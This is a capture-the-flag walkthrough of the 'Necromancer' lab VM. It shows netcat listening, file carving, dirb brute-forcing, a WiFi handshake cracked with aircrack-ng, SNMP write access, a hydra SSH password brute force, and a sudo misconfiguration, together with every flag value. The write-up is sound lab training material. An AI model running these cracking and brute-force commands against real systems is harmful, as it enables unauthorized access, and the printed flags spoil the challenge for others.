After hearing Xerubus talk about his new CTF VM, I thought I might give it a download and have a go. As it turns out, it is one of the best capture the flag virtual machine I have come across in sometime. It has a good mix of both skills and difficulties.

Flag 1

After finding the IP addess of the new VM image as 10.0.2.11 I ran a Nmap which showed no results. Weird. Next wireshark with ip.src==10.0.2.11 and saw VM is trying to connect on port 4444<

nc -lvp 4444
listening on [any] 4444 ...
10.0.2.11: inverse host lookup failed: Unknown host
connect to [10.0.2.4] from (UNKNOWN) [10.0.2.11] 2006
...V2VsY29tZSENCg0KWW91IGZpbmQgeW91cnNlbGYgc3RhcmluZyB0b3dhcmRzIHRoZSBob3Jpem9uLCB3aXRoIG5vdGhpbmcgYnV0IHNpbGVuY2Ugc3Vycm91bmRpbmcgeW91Lg0KWW91IGxvb2sgZWFzdCwgdGhlbiBzb3V0aCwgdGhlbiB3ZXN0LCBhbGwgeW91IGNhbiBzZWUgaXMgYSBncmVhdCB3YXN0ZWxhbmQgb2Ygbm90aGluZ25lc3MuDQoNClR1cm5pbmcgdG8geW91ciBub3J0aCB5b3Ugbm90aWNlIGEgc21hbGwgZmxpY2tlciBvZiBsaWdodCBpbiB0aGUgZGlzdGFuY2UuDQpZb3Ugd2FsayBub3J0aCB0b3dhcmRzIHRoZSBmbGlja2VyIG9mIGxpZ2h0LCBvbmx5IHRvIGJlIHN0b3BwZWQgYnkgc29tZSB0eXBlIG9mIGludmlzaWJsZSBiYXJyaWVyLiAgDQoNClRoZSBhaXIgYXJvdW5kIHlvdSBiZWdpbnMgdG8gZ2V0IHRoaWNrZXIsIGFuZCB5b3VyIGhlYXJ0IGJlZ2lucyB0byBiZWF0IGFnYWluc3QgeW91ciBjaGVzdC4gDQpZb3UgdHVybiB0byB5b3VyIGxlZnQuLiB0aGVuIHRvIHlvdXIgcmlnaHQhICBZb3UgYXJlIHRyYXBwZWQhDQoNCllvdSBmdW1ibGUgdGhyb3VnaCB5b3VyIHBvY2tldHMuLiBub3RoaW5nISAgDQpZb3UgbG9vayBkb3duIGFuZCBzZWUgeW91IGFyZSBzdGFuZGluZyBpbiBzYW5kLiAgDQpEcm9wcGluZyB0byB5b3VyIGtuZWVzIHlvdSBiZWdpbiB0byBkaWcgZnJhbnRpY2FsbHkuDQoNCkFzIHlvdSBkaWcgeW91IG5vdGljZSB0aGUgYmFycmllciBleHRlbmRzIHVuZGVyZ3JvdW5kISAgDQpGcmFudGljYWxseSB5b3Uga2VlcCBkaWdnaW5nIGFuZCBkaWdnaW5nIHVudGlsIHlvdXIgbmFpbHMgc3VkZGVubHkgY2F0Y2ggb24gYW4gb2JqZWN0Lg0KDQpZb3UgZGlnIGZ1cnRoZXIgYW5kIGRpc2NvdmVyIGEgc21hbGwgd29vZGVuIGJveC4gIA0KZmxhZzF7ZTYwNzhiOWIxYWFjOTE1ZDExYjlmZDU5NzkxMDMwYmZ9IGlzIGVuZ3JhdmVkIG9uIHRoZSBsaWQuDQoNCllvdSBvcGVuIHRoZSBib3gsIGFuZCBmaW5kIGEgcGFyY2htZW50IHdpdGggdGhlIGZvbGxvd2luZyB3cml0dGVuIG9uIGl0LiAiQ2hhbnQgdGhlIHN0cmluZyBvZiBmbGFnMSAtIHU2NjYi...

Base64 decoded too:

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!  You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. "Chant the string of flag1 - u666"


Great, we have the first flag and the hint for the next flag.

Flag 2

Figuring that “Chant the string of flag1 -u666” ment UDP port 666. I connected to server on UDP port 666 using “nc -u 10.0.2.11 666” send decoded flag1{e6078b9b1aac915d11b9fd59791030bf} as opensesame

returns

A loud crack of thunder sounds as you are knocked to your feet!

Dazed, you start to feel fresh air entering your lungs.

You are free!

In front of you written in the sand are the words:

flag2{c39cd4df8f2e35d20d92c2e44de5f7c6}

As you stand to your feet you notice that you can no longer see the flicker of light in the distance.

You turn frantically looking in all directions until suddenly, a murder of crows appear on the horizon.

As they get closer you can see one of the crows is grasping on to an object. As the sun hits the object, shards of light beam from its surface.

The birds get closer, and closer, and closer.

Staring up at the crows you can see they are in a formation.

Squinting your eyes from the light coming from the object, you can see the formation looks like the numeral 80.

As quickly as the birds appeared, they have left you once again.... alone... tortured by the deafening sound of silence.

666 is closed.

This has opened up port 80 and closed port 666.

Flag 3

Visiting port 80 in the web-browser. I see:

Hours have passed since you first started to follow the crows.

Silence continues to engulf you as you treck towards a mountain range on the horizon.

More times passes and you are now standing in front of a great chasm.

Across the chasm you can see a necromancer standing in the mouth of a cave, staring skyward at the circling crows.

As you step closer to the chasm, a rock dislodges from beneath your feet and falls into the dark depths.

The necromancer looks towards you with hollow eyes which can only be described as death.

He smirks in your direction, and suddenly a bright light momentarily blinds you.

The silence is broken by a blood curdling screech of a thousand birds, followed by the necromancers laughs fading as he decends into the cave!

The crows break their formation, some flying aimlessly in the air; others now motionless upon the ground.

The cave is now protected by a gaseous blue haze, and an organised pile of feathers lay before you.

image

Image copyright: Chris Maynard

Guessing that “organised pile of feathers lay before you” was hinting at the feather images call “pileoffeathers.jpg”, I run “foremost ./pileoffeathers.jpg” and got a zip file. Extracted zip file contained feathers.txt. Which had “ZmxhZzN7OWFkM2Y2MmRiN2I5MWMyOGI2ODEzNzAwMDM5NDYzOWZ9IC0gQ3Jvc3MgdGhlIGNoYXNtIGF0IC9hbWFnaWNicmlkZ2VhcHBlYXJzYXR0aGVjaGFzbQ==”

Bas64 decoded to:

flag3{9ad3f62db7b91c28b68137000394639f} - Cross the chasm at /amagicbridgeappearsatthechasm

Flag 4

Since it started with a slash it was a safe bet it is a URL: http://10.0.2.11/amagicbridgeappearsatthechasm/

You cautiously make your way across chasm.

You are standing on a snow covered plateau, surrounded by shear cliffs of ice and stone.

The cave before you is protected by some sort of spell cast by the necromancer.

You reach out to touch the gaseous blue haze, and can feel life being drawn from your soul the closer you get.

Hastily you take a few steps back away from the cave entrance.

There must be a magical item that could protect you from the necromancer's spell.

image

Created a word list of all magical items, replaces spaces with _ and -. No success.

Extracted all unique words from the same list and ran dirb again…

~/Desktop/magic_items# dirb http://10.0.2.11/amagicbridgeappearsatthechasm ./words3.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jul 14 23:22:25 2016
URL_BASE: http://10.0.2.11/amagicbridgeappearsatthechasm/
WORDLIST_FILES: ./words3.txt

-----------------

GENERATED WORDS: 1683

---- Scanning URL: http://10.0.2.11/amagicbridgeappearsatthechasm/ ----
+ http://10.0.2.11/amagicbridgeappearsatthechasm/talisman (CODE:200|SIZE:9676)

~/Desktop# wget http://10.0.2.11/amagicbridgeappearsatthechasm/talisman

~/Desktop# file talisman
talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2b131df906087adf163f8cba1967b3d2766e639d, not stripped

-----------------
END_TIME: Thu Jul 14 23:22:27 2016
DOWNLOADED: 1683 - FOUND: 1

File is obviously a linux executable

~/Desktop# chmod +x ./talisma
~/Desktop# ./talisman
You have found a talisman.
The talisman is cold to the touch, and has no words or symbols on it's surface.
Do you want to wear the talisman? yes
>Nothing happens.
Sending 100 times "a" gets "Segmentaion fault"

Time for a buffer overflow.

gdb magic to “chantToBreakSpell” function

You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337

Flag 5

“Chant these words at u31337” sounds like a similar clue. So off to UDP port 31337.

:~/Desktop# nc -u 10.0.2.11 31337
flag4{ea50536158db50247e110a6c89fcf3d3}Nothing happens.
ea50536158db50247e110a6c89fcf3d3Nothing happens.

Time to check if that flag is a hash so checking crackstation.net for ea50536158db50247e110a6c89fcf3d3 I get back: blackmagic

As you chant the words, a hissing sound echoes from the ice walls.

The blue aura disappears from the cave entrance.

You enter the cave and see that it is dimly lit by torches; shadows dancing against the rock wall as you descend deeper and deeper into the mountain.

You hear high pitched screeches coming from within the cave, and you start to feel a gentle breeze.

The screeches are getting closer, and with it the breeze begins to turn into an ice cold wind.

Suddenly, you are attacked by a swarm of bats!

You aimlessly thrash at the air in front of you!

The bats continue their relentless attack, until.... silence.

Looking around you see no sign of any bats, and no indication of the struggle which had just occurred.

Looking towards one of the torches, you see something on the cave wall.

You walk closer, and notice a pile of mutilated bats lying on the cave floor.  Above them, a word etched in blood on the wall.

/thenecromancerwillabsorbyoursoul

flag5{0766c36577af58e15545f099a3b15e60}

Flag 6

Back to the webbrowser at http://10.0.2.11/thenecromancerwillabsorbyoursoul/

flag6{b1c3ed8f1db4258e4dcb0ce565f6dc03}

You continue to make your way through the cave.

In the distance you can see a familiar flicker of light moving in and out of the shadows.

As you get closer to the light you can hear faint footsteps, followed by the sound of a heavy door opening.

You move closer, and then stop frozen with fear.

It's the necromancer!

image
Image copyright: Manzanedo

Again he stares at you with deathly hollow eyes.

He is standing in a doorway; a staff in one hand, and an object in the other.

Smirking, the necromancer holds the staff and the object in the air.

He points his staff in your direction, and the stench of death and decay begins to fill the air.

You stare into his eyes and then.......

...... darkness. You open your eyes and find yourself lying on the damp floor of the cave.

The amulet must have saved you from whatever spell the necromancer had cast.

You stand to your feet. Behind you, only darkness.

Before you, a large door with the symbol of a skull engraved into the surface.

Looking closer at the skull, you can see u161 engraved into the forehead.

Noticed the interesting link in that HTML page.

~/Desktop# wget http://10.0.2.11/thenecromancerwillabsorbyoursoul/necromancer

~/Desktop# file necromancer
necromancer: bzip2 compressed data, block size = 900k

file starts with “necromancer.cap”

Flag 7

tar -xjvf ./necromancer

open necromancer.cap in wireshark

Contains WIFI traffic for SSID “community”

aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt

password: death2all

no traffic

~/Desktop# snmpwalk 10.0.2.11 -c death2all -v1
Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!

root@windows2:~/Desktop# snmpget -v 1 -c death2allrw 10.0.2.11 iso.3.6.1.2.1.1.6.0
iso.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"
root@windows2:~/Desktop# snmpset -v 1 -c death2allrw 10.0.2.11 iso.3.6.1.2.1.1.6.0 "Unlocked"
iso.3.6.1.2.1.1.6.0: Needs value
root@windows2:~/Desktop# snmpset -v 1 -c death2allrw 10.0.2.11 iso.3.6.1.2.1.1.6.0 s "Unlocked"
iso.3.6.1.2.1.1.6.0 = STRING: "Unlocked"
root@windows2:~/Desktop# snmpwalk 10.0.2.11 -c death2all -v1
iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
End of MIB

Flag 8,9,10

iso.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."
iso.3.6.1.2.1.1.4.0 = STRING: "The door is unlocked! You may now enter the Necromancer's lair!"
iso.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"
iso.3.6.1.2.1.1.6.0 = STRING: "flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22"
End of MIB

Decrypts with crackstation to “demonslayer” - probably on TCP port 22 (ssh?).

~/Desktop# hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 10.0.2.11 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-07-15 00:40:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 10.0.2.11   login: demonslayer   password: 12345678
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-07-15 00:40:24

Great! Now we can login with SSH.

ssh demonslayer@10.0.2.11
12345678

.                                                      .
.n                   .                 .                  n.
.   .dP                  dP                   9b                 9b.    .
4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
)b.  .dbo.dP'`v'`9b.odb.  .dX(
,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
`'      9XXXXXX(   )XXXXXXP      `'
XXXX X.`v'.X XXXX
XP^X'`b   d'`X^XX
X. 9  `   '  P )X
`b  `       '  d'
`             '
THE NECROMANCER!
by  @xerubus

$ ls -lah
total 40
drwxr-xr-x  3 demonslayer  demonslayer   512B Jun 23 05:38 .
drwxr-xr-x  3 root         wheel         512B May 11 18:25 ..
-rw-r--r--  1 demonslayer  demonslayer    87B May 11 18:25 .Xdefaults
-rw-r--r--  1 demonslayer  demonslayer   773B May 11 18:25 .cshrc
-rw-r--r--  1 demonslayer  demonslayer   103B May 11 18:25 .cvsrc
-rw-r--r--  1 demonslayer  demonslayer   359B May 11 18:25 .login
-rw-r--r--  1 demonslayer  demonslayer   175B May 11 18:25 .mailrc
-rw-r--r--  1 demonslayer  demonslayer   218B May 11 18:25 .profile
drwx------  2 demonslayer  demonslayer   512B May 11 18:25 .ssh
-rw-r--r--  1 demonslayer  demonslayer   706B May 11 21:19 flag8.txt

cat flag8.txt

You enter the Necromancer's Lair!

A stench of decay fills this place.

Jars filled with parts of creatures litter the bookshelves.

A fire with flames of green burns coldly in the distance.

Standing in the middle of the room with his back to you is the Necromancer.

In front of him lies a corpse, indistinguishable from any living creature you have seen before.

He holds a staff in one hand, and the flickering object in the other.

"You are a fool to follow me here!  Do you not know who I am!"

The necromancer turns to face you.  Dark words fill the air!

"You are damned already my friend.  Now prepare for your own death!"

Defend yourself!  Counter attack the Necromancer's spells at u777!

nc -u localhost 777

** You only have 3 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Where do the Black Robes practice magic of the Greater Path?  Kelewan

flag8{55a6af2ca3fee9f2fef81d20743bda2c}

** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Who did Johann Faust VIII make a deal with? Mephistopheles

flag9{713587e17e796209d1df4c9c2c2d2966}

** You only have 2 hitpoints left! **

Defend yourself from the Necromancer's Spells!

Who is tricked into passing the Ninth Gate?  Hedge

flag10{8dc6486d2c63cafcdc6efbba2be98ee4}

A great flash of light knocks you to the ground; momentarily blinding you!

As your sight begins to return, you can see a thick black cloud of smoke lingering where the Necromancer once stood.

An evil laugh echoes in the room and the black cloud begins to disappear into the cracks in the floor.

The room is silent.

You walk over to where the Necromancer once stood.

On the ground is a small vile.

Flag 11

$ ls -lah<br />
total 44<br />
drwxr-xr-x &nbsp;3 demonslayer &nbsp;demonslayer &nbsp; 512B Jul 15 10:47 .<br />
drwxr-xr-x &nbsp;3 root &nbsp; &nbsp; &nbsp; &nbsp; wheel &nbsp; &nbsp; &nbsp; &nbsp; 512B May 11 18:25 ..<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; &nbsp;87B May 11 18:25 .Xdefaults<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 773B May 11 18:25 .cshrc<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 103B May 11 18:25 .cvsrc<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 359B May 11 18:25 .login<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 175B May 11 18:25 .mailrc<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 218B May 11 18:25 .profile<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 196B Jul 15 10:47 .smallvile<br />
drwx------ &nbsp;2 demonslayer &nbsp;demonslayer &nbsp; 512B May 11 18:25 .ssh<br />
-rw-r--r-- &nbsp;1 demonslayer &nbsp;demonslayer &nbsp; 706B May 11 21:19 flag8.txt<br />
$ cat .smallvile</p>

You pick up the small vile.

Inside of it you can see a green liquid.

Opening the vile releases a pleasant odour into the air.

You drink the elixir and feel a great power within your veins!

sudo -l Matching Defaults entries for demonslayer on thenecromancer:
env_keep+=”FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK”</p>

User demonslayer may run the following commands on thenecromancer:
(ALL) NOPASSWD: /bin/cat /root/flag11.txt
$ sudo cat /root/flag11.txt

Suddenly you feel dizzy and fall to the ground!

As you open your eyes you find yourself staring at a computer screen.

Congratulations!!! You have conquered......

.                                                      .
.n                   .                 .                  n.
.   .dP                  dP                   9b                 9b.    .
4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
)b.  .dbo.dP'`v'`9b.odb.  .dX(
,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
`'      9XXXXXX(   )XXXXXXP      `'
XXXX X.`v'.X XXXX
XP^X'`b   d'`X^XX
X. 9  `   '  P )X
`b  `       '  d'
`             '
THE NECROMANCER!
by  @xerubus

flag11{42c35828545b926e79a36493938ab1b1}

Big shout out to Dook and Bull for being test bunnies.

Cheers OJ for the obfuscation help.

Thanks to SecTalks Brisbane and their sponsors for making these CTF challenges possible.

"========================================="
"  xerubus (@xerubus) - www.mogozobo.com  "
"========================================="